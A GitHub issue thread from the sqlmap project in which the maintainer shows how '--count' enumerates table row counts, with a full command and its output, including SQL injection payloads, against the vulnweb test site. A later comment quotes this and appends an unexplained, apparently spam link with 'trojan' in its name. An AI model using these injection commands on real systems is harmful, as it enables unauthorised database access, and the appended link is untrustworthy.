### ISSUE TITLE
Counting table entries for all table in a single or multiple databases.

### ISSUE THREAD

**Issue by sharifulgeo** [sqlmapproject/sqlmap#5179]
I am testing `--count` switch of sqlmap and I know it expects a `-T` after the switch. I need to enumerate the number of entries in each and every tables of a single and multiple databases. 

I tried `--count` without `-T` but it does not respond correctly.

How can I enumerate the number of entries for each tables in a single and multiple databases.

**Comment by stamparm** [comment]
```
$ python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -D acuart --fresh-queries
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.9.2#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:12:07 /2022-09-25/

[16:12:08] [INFO] resuming back-end DBMS 'mysql' 
[16:12:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 8106=8106

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-5845 UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7071,0x564a4c7942574c44436c6b6c414e6c747453776c6c6575645549454b64504368556579527965484c,0x716b717171)-- -
---
[16:12:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[16:12:08] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[16:12:08] [INFO] fetching tables for database: 'acuart'
Database: acuart
+----------+---------+
| Table    | Entries |
+----------+---------+
| pictures | 7       |
| categ    | 4       |
| artists  | 3       |
| products | 3       |
| users    | 1       |
+----------+---------+

[16:12:12] [INFO] fetched data logged to text files under '/home/stamparm/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 16:12:12 /2022-09-25/
```

p.s. it doesn't expect the `-T` option. Also, you have to have read permissions on those tables

**Comment by Hankdisadvantaged8** [comment]
> ```
> $ python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -D acuart --fresh-queries
>         ___
>        __H__
>  ___ ___[)]_____ ___ ___  {1.6.9.2#dev}
> |_ -| . [']     | .'| . |
> |___|_  [)]_|_|_|__,|  _|
>       |_|V...       |_|   https://sqlmap.org
> 
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
> 
> [*] starting @ 16:12:07 /2022-09-25/
> 
> [16:12:08] [INFO] resuming back-end DBMS 'mysql' 
> [16:12:08] [INFO] testing connection to the target URL
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: artist (GET)
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: artist=1 AND 8106=8106
> 
>     Type: UNION query
>     Title: Generic UNION query (NULL) - 3 columns
>     Payload: artist=-5845 UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7071,0x564a4c7942574c44436c6b6c414e6c747453776c6c6575645549454b64504368556579527965484c,0x716b717171)-- -
> ---
> [16:12:08] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Nginx 1.19.0, PHP 5.6.40
> back-end DBMS: MySQL 8
> [16:12:08] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
> [16:12:08] [INFO] fetching tables for database: 'acuart'
> Database: acuart
> +----------+---------+
> | Table    | Entries |
> +----------+---------+
> | pictures | 7       |
> | categ    | 4       |
> | artists  | 3       |
> | products | 3       |
> | users    | 1       |
> +----------+---------+
> 
> [16:12:12] [INFO] fetched data logged to text files under '/home/stamparm/.local/share/sqlmap/output/testphp.vulnweb.com'
> 
> [*] ending @ 16:12:12 /2022-09-25/
> ```
> 
> p.s. it doesn't expect the `-T` option. Also, you have to have read permissions on those tables





https://trojan-engaging88.github.io/array-splice/
